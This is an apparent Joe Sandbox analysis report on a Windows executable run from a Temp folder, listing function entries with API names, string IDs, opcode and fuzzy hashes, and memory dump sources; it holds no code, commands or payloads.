                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                        • Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                        • Instruction ID: 4070e17beaec4be25e2a7dc50dad51560cedd959b0c352294a405b1fae162beb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4611C021E0865341FB68FB655E51179E1515F483A0F9483B4D93E0B6D6FEACF401C7A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                        • Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                        • Instruction ID: cc6725ed7deafd46ffaf7bd10f63504a460a0e8a6915e9177cc2d3626f3169bd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B112821A0861341FF68FA650C121BDA2815F49360F9407B8DA3E0F2D2FDACB840C2A1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                        • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                        • Instruction ID: 4c4d965ae334e5eea735eceaeceb8488a06c160fff8aaaf1468d7748cb200fee
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4991BF32A08A4781F721EE25D8513BDB691BB00B94FC84176DAAD473D5FEBCE845C3A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                        • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                        • Instruction ID: e05ea64dc7658ef1133355f7f77d05c7b5a47bced7714f57b666e921e9a79871
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8581A572E0D20385F764EF25C920678B6A0EB21744FD580B5CA2A972D5FFADE801D7E1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                        • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                        • Instruction ID: c283b7e89bff7e2eb95016b61def153c617c5282ffdd1b5b72fa678781b741aa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9518D36B1A6028ADB14EF25F444A79A791EB84B98F908131DA79477C8DFFCEC41C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                        • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                        • Instruction ID: 71e93d2c4864e979c22c9f9ae28f1800cba42d84eb2bf66848fe12f1b8fb45be
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75617032A08BC581D721AB15E4407AAF7A0FBC9794F444225EBAC07B95DFFCE590CB50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                        • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                        • Instruction ID: dc117d2edb916acb2de01740960e46deac0fb3a6ccf696155ab65edb925f4f73
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED51AE32A0864686EB24AB119044278B6E0FBD4B96F944136DB7C47BD6CFFCE851C791
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF7F24F324C,?,?,00007FF7F24F3964), ref: 00007FF7F24F7642
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                        • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                        • Instruction ID: 7e4bd6e08d63c6d2ff0a088b98b374c30e33823be850a23282945950e58f3f24
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E31D621719AC585FB21AB15E8507BAA254FBC4BE0F804231EE7D47BC9DFACDA05C750
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                        • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                        • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                        • Instruction ID: f292b2dfb7995de627ce9c9cda825e34b3aea0127c1fcf93e4191e85caec3c21
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03118E72728A8581EB20AB10E461BA9B364FB88B88FD01135DA6C47684DFBCD605C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                        • API String ID: 1878133881-653037927
                                                                                                                                                                                                                        • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                        • Instruction ID: 41f03b2bacad80bd4bae639e0df5c9b7158be2f1315a71a07e47970a6669b881
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C119372628B4681FB20AF00F461BA9B364FF88B84FD01135DA6C47684DFBCDA05C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                        • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                        • Instruction ID: 0a24f2f5aed08db6b2948f0eefe5c59cd53e72350f50757fef28760889463df8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DD14872B08A828AE710DF75D8902EC77B1FB44798B844275CE6E57BC9EE78D406C390
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                        • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                        • Instruction ID: c0d1a02d48549299a626670da131a1bb6b8de7f0325b609bac8aa91ef087be56
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3351F672F041268AEB14EF649D456BCB7A1AB10368FA00179DE3E57AE5EB78A401C750
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                        • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                        • Instruction ID: 3cfe055ab2e9fcabfd485b4d9a1b635b330fb8b4ef0fca23f9dce2a763d83dec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B519032E046428AFB14EF71D8503BDA3A1FB48B58F508575DE19476C8EFB8D481C7A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                        • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                        • Instruction ID: ea8a2440f696230fa8835060104cba3a7deecb789aa79b16d464c1c31daf486e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C11A322B1814242FB54EB69E5442B99292EBC8B90FC49031DA7907BCDCDEDD881CA60
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
• Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                        • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                        • Instruction ID: 652e953f8faf75f721f0286b3b83e3d1433dcca6835127f0a8cb39d06d560bbe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65113A22B14B058AEB00DF60E8542B873A4FB59768F841E35DA3D877E4DFBCE158C290
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                        • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                        • Instruction ID: e679f36f5910ab0f40dbf0c3fad864f4e0202ba6299c5fd84570d722836c228a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4441F422B1868257FB24AF25940137AE650EB80BB4F945275EE6C07BD9EFBCD481C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F250835E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: GetLastError.KERNEL32(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C78
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F24FBEC5), ref: 00007FF7F250837C
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                        • API String ID: 3580290477-841510543
                                                                                                                                                                                                                        • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                        • Instruction ID: d4dc84eea2f4ff4940494296e607084628d9083416cf6aad3d8aabb1da7a25e9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C641C331A08B5386E714FF25AC454BCA3A4FF44794B855075EA6D477C5EE7CD481C3A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
